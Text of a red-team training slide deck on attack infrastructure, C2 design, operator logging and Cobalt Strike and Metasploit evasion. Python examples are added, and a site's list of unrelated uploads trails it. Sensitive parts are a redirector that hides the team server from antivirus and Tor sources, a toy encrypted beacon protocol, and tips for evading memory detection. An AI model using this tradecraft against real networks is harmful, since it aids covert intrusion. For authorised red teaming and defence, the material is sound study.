Introduction to Red Team Operations
Sunny Neo (@sunn_y_k)
sunny@live.com.sg
#whoami
•Perpetual Information Security Student
•Penetration Tester @ Centurion Information Security
•It was really hard to get here - On and Off Fever Last Night
Disclaimer
•All views are mine and not the company I work for or any organisation that I am affiliated with.
•I take NULL credit for all the materials presented here
•I am here just to share the good work from awesome people and have fun
Shout Out - Raphael Mudge (@armitagehacker)
•Awesome resource on Red Team Operations
•Advanced Threat Tactics (2015)
https://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
https://www.youtube.com/watch?v=4w7krkqxRck&list=PL9HO6M_MU2nf8Fa5bVefBW-9bg5Rx94_c
•https://blog.cobaltstrike.com/
Shout Out - Jeff Dimmock (@bluscreenofjeff)
•Awesome materials on Red Team Infrastructure
•https://bluescreenofjeff.com/2017-12-05-designing-effective-covert-red-team-attack-infrastructure/
•https://speakerdeck.com/bluscreenofjeff/building-a-better-moat-designing-an-effective-covert-red-team-attack-infrastructure
•https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
Shout Out
•Anyone who shared their experience with me or answered my stupid questions over Twitter / Slack (BloodHoundGang) / Beer(s)
Objective
•Share my journey on learning about Red Team Operations
•Bridge the gap between Penetration Testers and Red Teamers
Penetration Testing
•Scope Provided
• Limited to No Reconnaissance Required
•No Stealth required
• Scan everything in Scope
• Run tools out of the box (Did you rebuild the tool?)
•Simple to No Infrastructure setup
Red Team Operation
• Test your security investment in a realistic way – objective based
• Depends on the type of operation
• Full Scope Testing (Physical, Social and Cyber)
• Long-Term Operation
• Threat Emulation (Emulating a real-world actor)
Source:
https://blog.cobaltstrike.com/2015/07/09/models-for-red-team-operations/
https://blog.cobaltstrike.com/2016/02/17/the-threat-emulation-problem/
Red Team Operation
•Generally
• Limited Information Provided
• Require Stealth
• Require Appropriate Infrastructure Setup for the operation
Transitional Challenges
•Mindset
•Habits
•Scale
(Figure: Pen Tester -> Red Teamer)
Mindset
•Boxed-in by Scope
•Emphasis on coverage of the systems and vulnerabilities in scope
•Does not look for the easiest path to the objective
Habits
•Guided by Mindset
•Scan everything in Scope due to emphasis on coverage
•Does not apply an adversary's tradecraft; uses whatever gets the job done
Scale
•No clearly defined scope - How to start?
•Excessive Information - How do you manage the information gathered along the way, given the vague scope?
Principles for Red Team Operations (Mine)
•Protect your Infrastructure
•Log Everything!
•Less is More
•Don’t Get Caught
Protect Your Infrastructure
•Why the need for Infrastructure?
•Why the need to protect your infrastructure?
Typical Penetration Test Infrastructure
Source: https://bluescreenofjeff.com/2017-12-05-designing-effective-covert-red-team-attack-infrastructure/
Services Required for Red Team Operations
•SMTP Server – Phishing
•Web and Database Servers – Phishing and Storing Stolen Credentials
•Payload/Staging Servers – Storing and Sending Payloads
•Multiple Teamservers – C2
Shell Management
•Never do anything from just one shell on one team server
•Always try to persist and expand to more shell accesses
•Red team infrastructure design is critical for covert operations
 • Short-haul servers – initial access and post-exploitation activities
 • Long-haul servers – low and slow callbacks and session passing
•https://blog.cobaltstrike.com/2014/09/09/infrastructure-for-ongoing-red-team-operations/
Redirector and Filtering
Source: https://bluescreenofjeff.com/2017-12-05-designing-effective-covert-red-team-attack-infrastructure/
Apache Redirector - .htaccess
Source: https://bluescreenofjeff.com/2016-04-12-combatting-incident-responders-with-apache-mod_rewrite/
.htaccess Blacklisting
•Jason Lang (@curi0usJack)
•.htaccess to redirect:
 • known AV companies' IP address ranges
 • TOR exit nodes
•https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10
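The decision that the redirector slides and the .htaccess block-list above describe, modelled in Python as an added example (not code from the slides, from Jeff Dimmock's posts or from the gist): route() makes the per-request decision, and htaccess() renders the same policy as an Apache 2.4 mod_rewrite block so a long block-list does not have to be hand-edited. The network ranges, User-Agent, URIs, decoy site and team server address are constructed placeholders, not real vendor or Tor ranges.

```python
import ipaddress

# Source ranges that must never reach the team server (constructed for this example;
# a real list such as the gist above holds AV/sandbox and Tor exit ranges).
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in ("203.0.113.0/24", "198.51.100.128/25")]
BEACON_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Trident/7.0"  # UA the C2 profile sends (assumed)
C2_URIS = ("/updates/check", "/api/v1/status")                      # URIs from the C2 profile (assumed)
DECOY = "https://www.example.com/"                                  # benign site for everyone else
TEAMSERVER = "https://10.0.0.5"                                      # hypothetical back-end team server


def route(remote_addr, user_agent, uri):
    """Decide what the redirector does with one request.

    Only a request from a non-block-listed source that looks exactly like our
    beacon is proxied to the team server; everything else (responders, sandboxes,
    browsers, scanners) is redirected to the decoy and never sees the C2.
    """
    ip = ipaddress.ip_address(remote_addr)
    if any(ip in net for net in BLOCKED_NETWORKS):
        return "redirect", DECOY
    if user_agent != BEACON_UA or uri not in C2_URIS:
        return "redirect", DECOY
    return "proxy", TEAMSERVER + uri


def htaccess():
    """Render the same policy as an Apache 2.4 mod_rewrite block.

    Consecutive RewriteCond lines are ANDed unless flagged [OR], so the block-list
    becomes one OR-chain ending in a redirect, followed by the allow rule and a
    catch-all redirect. '-R' is ap_expr shorthand for %{REMOTE_ADDR} -ipmatch,
    so CIDR ranges need no regex escaping.
    """
    lines = ["RewriteEngine On"]
    for i, net in enumerate(BLOCKED_NETWORKS):
        flag = " [OR]" if i < len(BLOCKED_NETWORKS) - 1 else ""
        lines.append(f"RewriteCond expr \"-R '{net}'\"{flag}")
    lines.append(f"RewriteRule ^.*$ {DECOY} [L,R=302]")
    lines.append(f"RewriteCond expr \"%{{HTTP_USER_AGENT}} == '{BEACON_UA}'\"")
    lines.append("RewriteCond %{REQUEST_URI} ^(" + "|".join(C2_URIS) + ")$")
    lines.append(f"RewriteRule ^.*$ {TEAMSERVER}%{{REQUEST_URI}} [P,L]")
    lines.append(f"RewriteRule ^.*$ {DECOY} [L,R=302]")
    return "\n".join(lines)


if __name__ == "__main__":
    print(route("203.0.113.7", BEACON_UA, "/updates/check"))   # block-listed source: decoy
    print(route("192.0.2.10", BEACON_UA, "/updates/check"))    # looks like our beacon: proxy
    print(htaccess())
```

The [P] flag needs mod_proxy loaded on the redirector; everything that is not an exact match on both the User-Agent and a profile URI is handed the decoy, which is the "deny by default" posture the linked post argues for.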
Automate Your Infrastructure
• Painful to rebuild everything for each engagement
• Automate infrastructure setup with Coalfire's Red Baron Terraform examples
• https://rastamouse.me/2017/08/automated-red-team-infrastructure-deployment-with-terraform---part-1/
• https://rastamouse.me/2017/08/automated-red-team-infrastructure-deployment-with-terraform---part-2/
• https://github.com/Coalfire-Research/Red-Baron
Red Baron
Source: https://github.com/Coalfire-Research/Red-Baron/blob/master/examples/complete_c2.tf
C2 Protocol Considerations
Source: https://bluescreenofjeff.com/2017-12-05-designing-effective-covert-red-team-attack-infrastructure/
Command and Control (C2) Security
• Protect your customer’s systems and data
• You don’t want your agents/beacons to be hijacked or confidential data
leaked
• Evaluate the C2 security based on
• Encryption
• Authentication
• Anti Replay Attacks
• https://medium.com/@malcomvetter/responsible-red-teams-1c6209fd43cc
Staged Beacon Process
1. TeamServer -> Victim: staged payload; the stage carries the TeamServer public key
2. Victim -> TeamServer: initial callback with the beacon metadata and a session key generated on the victim, encrypted with the TeamServer public key
3. TeamServer -> Victim: tasks, encrypted with the session key
4. Victim -> TeamServer: task output, encrypted with the session key
Source: Raphael Mudge - Advanced Threat Tactics (2 of 9): Infrastructure
https://www.youtube.com/watch?v=3gBJOJb8Oi0&feature=youtu.be&t=49m55s
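The exchange the two slides above describe, run end to end as an added example (not code from the slides, from Cobalt Strike or from Metasploit) using only the Python standard library, so that the three evaluation points from the C2 security slide (encryption, authentication, anti-replay) can be exercised against a replayed task, a tampered task and a rogue server. The textbook RSA and the HMAC-based stream cipher are illustrative stand-ins for the real tool's primitives and are not fit for production use; the message layout, the host label and the error strings are assumptions.

```python
import hashlib
import hmac
import os
import secrets
import struct

# --- toy textbook RSA (no padding): stands in for the real key wrapping, illustration only ---
def _is_prime(n, rounds=16):
    """Miller-Rabin probable-prime test."""
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def _prime(bits):
    while True:
        candidate = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if _is_prime(candidate):
            return candidate

def rsa_keygen(bits=512):
    e = 65537
    while True:
        p, q = _prime(bits), _prime(bits)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            return (p * q, e), (p * q, pow(e, -1, phi))  # (public, private)

def rsa_wrap(pub, data):
    n, e = pub
    return pow(int.from_bytes(data, "big"), e, n).to_bytes((n.bit_length() + 7) // 8, "big")

def rsa_unwrap(priv, blob, length):
    n, d = priv
    return pow(int.from_bytes(blob, "big"), d, n).to_bytes(length, "big")

class Channel:
    """Encrypt-then-MAC envelope keyed from the session key. Each side labels and
    numbers what it sends, so a captured message cannot be replayed or reflected."""

    def __init__(self, session_key, me):
        self.k_enc = hmac.new(session_key, b"enc", hashlib.sha256).digest()
        self.k_mac = hmac.new(session_key, b"mac", hashlib.sha256).digest()
        self.me, self.send_seq, self.recv_seq = me, 0, -1

    def _xor(self, nonce, data):
        # HMAC-SHA256 as a PRF in counter mode: a stdlib-only stream cipher
        blocks = (hmac.new(self.k_enc, nonce + struct.pack(">I", i), hashlib.sha256).digest()
                  for i in range(-(-len(data) // 32)))
        return bytes(a ^ b for a, b in zip(data, b"".join(blocks)))

    def seal(self, plaintext):
        header = self.me + struct.pack(">Q", self.send_seq) + os.urandom(12)  # 21 bytes
        self.send_seq += 1
        body = self._xor(header[9:], plaintext)
        return header + body + hmac.new(self.k_mac, header + body, hashlib.sha256).digest()

    def unseal(self, blob):
        header, body, tag = blob[:21], blob[21:-32], blob[-32:]
        if not hmac.compare_digest(tag, hmac.new(self.k_mac, header + body, hashlib.sha256).digest()):
            raise ValueError("bad MAC: tampered, or sealed by someone without the session key")
        seq = struct.unpack(">Q", header[1:9])[0]
        if header[:1] == self.me or seq <= self.recv_seq:
            raise ValueError("replayed or reflected message")
        self.recv_seq = seq
        return self._xor(header[9:], body)

class TeamServer:
    def __init__(self):
        self.pub, self._priv = rsa_keygen()  # the public key ships inside the stage
        self.sessions = {}

    def initial_callback(self, wrapped):
        meta = rsa_unwrap(self._priv, wrapped, 48)  # 32-byte session key + 16-byte beacon id
        beacon_id = meta[32:].rstrip(b"\0")
        self.sessions[beacon_id] = Channel(meta[:32], b"S")
        return beacon_id

class Beacon:
    def __init__(self, server_pub, beacon_id):
        session_key = os.urandom(32)  # chosen on the victim, never sent in the clear
        self.callback = rsa_wrap(server_pub, session_key + beacon_id.ljust(16, b"\0"))
        self.chan = Channel(session_key, b"B")

    def handle_task(self, blob):
        return self.chan.seal(b"output of " + self.chan.unseal(blob))

def demo():
    ts = TeamServer()
    beacon = Beacon(ts.pub, b"WKSTN01")  # constructed host label
    chan = ts.sessions[ts.initial_callback(beacon.callback)]
    task = chan.seal(b"whoami")
    results = {"output": chan.unseal(beacon.handle_task(task))}
    tampered = bytearray(task)
    tampered[22] ^= 0x01  # flip one ciphertext bit
    rogue = Channel(os.urandom(32), b"S")  # knows the public key, not the session key
    for name, blob in (("replay", task), ("tamper", bytes(tampered)), ("hijack", rogue.seal(b"shell whoami"))):
        try:
            beacon.handle_task(blob)
            results[name] = "accepted"
        except ValueError as err:
            results[name] = str(err)
    return results

if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The hijack case is the one the "responsible red teams" link is about: a rogue server that has the stage (and therefore the public key) still cannot produce a task the beacon accepts, because tasking is keyed by the session key that only the victim and the real team server hold. Tools that skip the MAC or the sequence number fail the "tamper" or "replay" case in the same way.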
Log Everything!
• Important to have timestamped logs for
• Timeline of Events
• Clean up
• Investigation if anything goes down
• Empire and Cobalt Strike are fine…
• cmd.exe?
• PowerShell?
• bash?
• Metasploit?
• RDP?
Log Everything!
Command Prompt
  prompt $D$S$T$S$P$G
PowerShell (PowerShell profile or GPO)
  Start-Transcript -Path C:\pslogging\transcript.txt -Append -IncludeInvocationHeader
  (-Append rather than -NoClobber, so a second session does not fail because the file already exists)
  OR
  Computer Configuration – Administrative Templates – Windows Components – Windows PowerShell – "Turn on PowerShell Transcription"
Bash (~/.bashrc)
  # Enable a timestamp in the prompt and use screen to log the session
  PS1='\D{%F %T} [\u@\h \W]\$ '
  screen -L -Logfile engagementXX.log bash   # -Logfile needs GNU screen 4.06 or later
  # Expand history limits (empty means no limit in bash 4.3 and later), enable timestamps
  # and append commands to the history from multiple terminals
  export HISTSIZE=
  export HISTFILESIZE=
  export HISTTIMEFORMAT="%d/%m/%y %T "
  export HISTCONTROL=ignoredups:erasedups
  shopt -s histappend
  export PROMPT_COMMAND="history -a; history -c; history -r; $PROMPT_COMMAND"
Msfconsole (~/.msf4/msfconsole.rc)
  set ConsoleLogging true
  set LogLevel 5
  set SessionLogging true
  set TimestampOutput true
  set PromptTimeFormat %Y/%m/%d %H:%M:%S
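What the timestamps are for is the "timeline of events" from the previous slide. The following Python is an added example (not part of the slides) that merges three of the log sources configured above into one ordered timeline. The inputs are constructed samples in the formats those settings produce; it assumes every operator box runs on UTC (worth enforcing, or the sources will not line up), that the cmd.exe session was captured by your terminal or RDP client, and that $D prints a weekday and a MM/DD/YYYY date as it does on a US-locale box.

```python
import re
from datetime import datetime, timezone

# Constructed samples, in the formats the settings above produce:
#  - bash history with HISTTIMEFORMAT: a '#<epoch>' line precedes each command
#  - screen log of a shell whose PS1 is '\D{%F %T} [\u@\h \W]\$ '
#  - cmd.exe session with 'prompt $D$S$T$S$P$G' (US locale assumed for the date)
BASH_HISTORY = """#1712063990
nmap -sS -p 445 10.10.10.0/24
#1712064090
python3 smbclient.py corp/svc@10.10.10.7
"""
SCREEN_LOG = """2024-04-02 13:18:30 [op@redbox ops]$ crackmapexec smb 10.10.10.7 -u svc -p -
2024-04-02 13:21:05 [op@redbox ops]$ scp loot.zip longhaul:/srv/
"""
CMD_LOG = r"""Tue 04/02/2024 13:20:00.11 C:\Users\svc>whoami /priv
Tue 04/02/2024 13:22:41.57 C:\Users\svc>net group "Domain Admins" /domain
"""

SCREEN_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \[[^\]]*\]\$ (.+)$")
CMD_RE = re.compile(r"^(?:\w{3} )?(\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})\.(\d{2}) [A-Za-z]:[^>]*>(.+)$")
UTC = timezone.utc  # every operator box is assumed to run on UTC so the sources line up


def parse_bash_history(text):
    """HISTTIMEFORMAT writes '#<epoch>' before each command; pair them up."""
    events, stamp = [], None
    for line in text.splitlines():
        if line.startswith("#") and line[1:].isdigit():
            stamp = datetime.fromtimestamp(int(line[1:]), tz=UTC)
        elif line.strip() and stamp is not None:
            events.append((stamp, "bash", line.strip()))
            stamp = None
    return events


def parse_screen_log(text):
    """Keep only prompt-stamped lines; command output and escape codes are skipped."""
    events = []
    for line in text.splitlines():
        m = SCREEN_RE.match(line)
        if m:
            ts = datetime.strptime(m[1], "%Y-%m-%d %H:%M:%S").replace(tzinfo=UTC)
            events.append((ts, "screen", m[2]))
    return events


def parse_cmd_log(text):
    """$T prints hundredths of a second; keep them so ordering within a second holds."""
    events = []
    for line in text.splitlines():
        m = CMD_RE.match(line)
        if m:
            ts = datetime.strptime(m[1], "%m/%d/%Y %H:%M:%S").replace(microsecond=int(m[2]) * 10000, tzinfo=UTC)
            events.append((ts, "cmd", m[3]))
    return events


def build_timeline(bash=BASH_HISTORY, screen=SCREEN_LOG, cmd=CMD_LOG):
    """Merge all sources into one list of (timestamp, source, command), oldest first."""
    return sorted(parse_bash_history(bash) + parse_screen_log(screen) + parse_cmd_log(cmd))


if __name__ == "__main__":
    for ts, source, command in build_timeline():
        print(f"{ts.isoformat()}  {source:6}  {command}")
```

The merged list is what you hand to the blue team during the wash-up and what you walk backwards through for clean-up; the same parsers feed a search index of the kind the "Less is More" slide recommends.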
Less Is More: Information Management
•Don’t just collect information mindlessly
•Use as many scripts as possible to perform data mining
•Have processes/tools to categorise the information and logs collected so that they can be looked up easily
•http://www.harmj0y.net/blog/redteaming/push-it-push-it-real-good/
•https://vincentyiu.co.uk/cobaltsplunk/
Don't Get Caught?
(Figure: Target, TTPs, Toolset)
Target
• Knowing your target
• Knowing what kind of controls they have
• Controls
• Email Filtering Gateway
• Egress Filtering and Authenticated Proxy with Domain Categorization
• IDS/IPS (This Gen, Next Gen, Future Gen)
• Sandbox
• Antivirus (This Gen, Next Gen, Future Gen)
• Endpoint Detection & Response
• Security Operations Center with analysts looking at the alerts
Tactics, Techniques and Procedures (TTPs)
•What is the mode of operation?
• Smash and Grab
• Diversion
• Long-Term Operation
Tactics, Techniques and Procedures (TTPs)
•Tradecraft – Bad Guy’s Best Practices
•Learn from the Bad Guys
• Threat Intelligence Reports
• https://github.com/kbandla/APTnotes
• https://github.com/aptnotes/data
• MITRE ATT&CK Framework
• https://attack.mitre.org/wiki/Main_Page
• https://github.com/redcanaryco/atomic-red-team
Toolset
•Are your tools suitable for the operation?
•Are you able to make operation trade-offs based on your knowledge
of your tools?
• What is the workflow of the tool?
• What artifacts are created?
Metasploit & Meterpreter
•Web Delivery Module with windows/meterpreter/reverse_tcp
Web Delivery Module Process
1. Run the PowerShell one-liner to download and execute the PowerShell stager
2. The stager fetches the (encoded) stage (a DLL) and passes control to the stage
3. The stage decodes itself if needed and performs reflective DLL injection to run the actual payload
PowerShell Stager on Wire
• Run the PowerShell One-liner to download and execute PowerShell Stager
Stage on Wire
•The stager fetches the (encoded) stage (DLL) and passes control to the stage
EnableStageEncoding Option
•Web Delivery Module with windows/meterpreter/reverse_tcp
•EnableStageEncoding => true
Encoded Stage (DLL)
Memory Artifacts
(Reflective) DLL Injection Overview
Step 1: Process A attaches to (opens a handle to) Process B.
Step 2: Process A allocates a new memory section in Process B.
Step 3: Process A writes either the DLL path (classic injection) or the DLL content itself (reflective injection) into that section.
Step 4: Process A starts a new thread in Process B that executes LoadLibrary on the path (classic) or the reflective loader embedded in the DLL (reflective).
*For classic DLL injection the DLL file has to be written to disk; reflective injection loads it from memory.
Source: http://blog.opensecurityresearch.com/2013/01/windows-dll-injection-basics.html
Staged Meterpreter Memory Artifact
Payload:
windows/meterpreter/reverse_http
Staged Meterpreter Memory Artifact
Decoded Stage
Staged Meterpreter Memory Artifact
Actual Payload (metsrv.dll) Running
Metasploit Paranoid Mode
•(Generally) Metasploit should not be used for red teaming because most of its payloads can be hijacked and many signatures have been created for them
•If you need to, use Paranoid Mode: payload UUID whitelisting and SSL certificate pinning to prevent hijacking
•Use "reverse_winhttps" instead of "reverse_https" to enable SSL certificate pinning in the stager
Cobalt Strike
•Adversary Simulation Tool
•Features
• Team Operation
• Client Side Exploitation
• Asynchronous Post Exploitation
• Covert Communication Flexibility
Cobalt Strike - Default Staged Beacon
Cobalt Strike - Default Stage Memory
Cobalt Strike - Default Beacon Memory
Cobalt Strike - Default Strings in Stage and Beacon
Memory Detection Heuristic
• Thread start address or executable memory region not backed by a file on disk
• Static image size (the same tool version always allocates the same size)
• RWX page memory permissions
• Known strings and PE headers left in memory
• William Burgess & Matt Watkins - Advanced Attack Detection
https://www.youtube.com/watch?v=ihElrBBJQo8
• Raphael Mudge – In-memory Evasion (1 of 4) - Detections
https://www.youtube.com/watch?v=lz2ARbZ_5tE
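The heuristics above, applied to constructed memory-region records as an added example (not code from the slides or from the two talks cited). The records are the kind of thing you read out with VirtualQueryEx or from a memory dump; the watch-list strings and image sizes are illustrative, not real Beacon or Meterpreter signatures. The sample set holds a legitimate module, a default staged beacon, the same beacon after the Malleable PE obfuscate and cleanup options described on the following slides, and a module-stomped one, so the effect of each option on the score is visible.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Illustrative watch-lists (constructed, not real signatures): strings a default
# stage or beacon leaves behind, and image sizes that are constant for one build.
KNOWN_STRINGS = (b"ReflectiveLoader", b"beacon.dll", b"metsrv.dll")
KNOWN_IMAGE_SIZES = {0x3A000, 0x2E000}


@dataclass
class Region:
    base: int
    size: int
    protect: str                     # "RWX", "RX", "RW", ...
    mapped_file: Optional[str]       # None when the memory is not backed by a file on disk
    head: bytes                      # first bytes of the region
    strings: Tuple[bytes, ...] = ()  # printable strings recovered from the region
    thread_start: bool = False       # some thread's start address lies inside this region


def score_region(r: Region) -> Tuple[int, List[str]]:
    """Apply the heuristics above; one point per indicator, with the reasons."""
    private = r.mapped_file is None
    reasons = []
    if private and "X" in r.protect:
        reasons.append("executable memory not backed by a file")
    if r.protect == "RWX":
        reasons.append("RWX page permissions")
    if private and r.head.startswith(b"MZ"):
        reasons.append("PE header in private memory")
    hits = [s.decode() for s in KNOWN_STRINGS if s in r.strings]
    if hits:
        reasons.append("known strings: " + ", ".join(hits))
    if private and r.size in KNOWN_IMAGE_SIZES:
        reasons.append("size matches a known image size")
    if private and r.thread_start:
        reasons.append("thread started in private memory")
    return len(reasons), reasons


def triage(regions, threshold=2):
    """Regions scoring at or above the threshold, most suspicious first."""
    scored = [(hex(r.base), *score_region(r)) for r in regions]
    return sorted((s for s in scored if s[1] >= threshold), key=lambda s: -s[1])


# Constructed regions: a legitimate module, a default staged beacon, the same
# beacon with obfuscate/cleanup applied, and a module-stomped beacon (file name made up).
SAMPLE_REGIONS = [
    Region(0x7FFA1000, 0x1F0000, "RX", r"C:\Windows\System32\ntdll.dll", b"MZ\x90\x00"),
    Region(0x1A30000, 0x3A000, "RWX", None, b"MZ\x90\x00",
           (b"ReflectiveLoader", b"beacon.dll"), thread_start=True),
    Region(0x2B40000, 0x3C000, "RX", None, b"\x00\x00\x00\x00", (), thread_start=True),
    Region(0x6F000000, 0x3C000, "RX", r"C:\Windows\System32\stomped.dll", b"MZ\x90\x00",
           (), thread_start=True),
]


if __name__ == "__main__":
    for base, score, reasons in triage(SAMPLE_REGIONS):
        print(base, score, "; ".join(reasons))
```

The obfuscated beacon loses the PE header, the strings, the RWX pages and the static size, but still scores on private executable memory that owns a thread; that residual signal is what module stomping removes, at the cost of a file-backed region whose contents no longer match the DLL on disk, a comparison this example does not make.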
Cobalt Strike – Malleable PE
•https://www.cobaltstrike.com/help-malleable-c2#memory
Cobalt Strike – Malleable PE
• obfuscate: "true" (Cobalt Strike 3.11 and later)
 • The reflective loader does not initialise unnecessary PE headers in the memory section allocated for Beacon
 • Masks the DLL import table
 • Obfuscates the known Beacon strings
• cleanup: "true"
 • Frees the memory of the stage once Beacon is running
• module_x86 / module_x64
 • Module stomping: LoadLibrary a DLL that is not already loaded and copy the Beacon DLL into its memory space
Cobalt Strike – Malleable PE
Demo
Cobalt Strike – Malleable PE
•Additional modification options
 • prepend – prepend bytes before the DLL headers
 • strrep – replace a string found in the DLL
•Could be used for threat emulation
 • peclone known malware binaries
 • Configure based on the strings in known YARA rules for the malware being emulated
Cobalt Strike – Best Practices
•Things you can do to make your Beacon harder to detect
• Use Malleable Profile and PE
• Do Session Prepping
• Use “spawnto” to change the default process for Post Exploitation Activities
• Use In-memory .NET Assembly Execution for Post Exploitation activities
• Avoid using Stager
• Avoid using PowerShell
• Avoid Remote Process Injection
Cobalt Strike – Best Practices
•Recommended to Read/Watch
• https://blog.cobaltstrike.com/2018/04/23/fighting-the-toolset
• https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/
• https://blog.cobaltstrike.com/2017/10/25/modern-defenses-and-you/
• https://blog.cobaltstrike.com/2017/06/23/opsec-considerations-for-beacon-commands/
Other approaches to Detect Beacon
Source: https://twitter.com/jackcr/status/992390807268352001
Questions?
Other References
• https://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac
• https://www.netscylla.com/whitepapers/Crestcon18_Common_Pitfalls_in_Redteaming.pdf
• https://blog.cobaltstrike.com/2013/06/28/staged-payloads-what-pen-testers-should-know/
• https://www.slideshare.net/44Con/44con-meterpreter-internalsv2
• http://buffered.io/posts/staged-vs-stageless-handlers/
• https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/
• https://www.blackhat.com/docs/us-16/materials/us-16-Nipravsky-Certificate-Bypass-Hiding-And-Executing-Malware-From-A-Digitally-Signed-Executable-wp.pdf
• https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
• https://www.slideshare.net/JoeDesimone4/taking-hunting-to-the-next-level-hunting-in-memory
• https://ketansingh.net/make-executable-harder-to-recover-from-memory/
• https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Int0X80-Anti-Forensics-AF.pdf
• https://www.veil-framework.com/least-privilege-removing-unnecessary-memory-permissions/
• Michael Hale Ligh, Andrew Case, Jamie Levy, Aaron Walters (2014) - The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux and Mac Memory

Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 

Recently uploaded (20)

DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
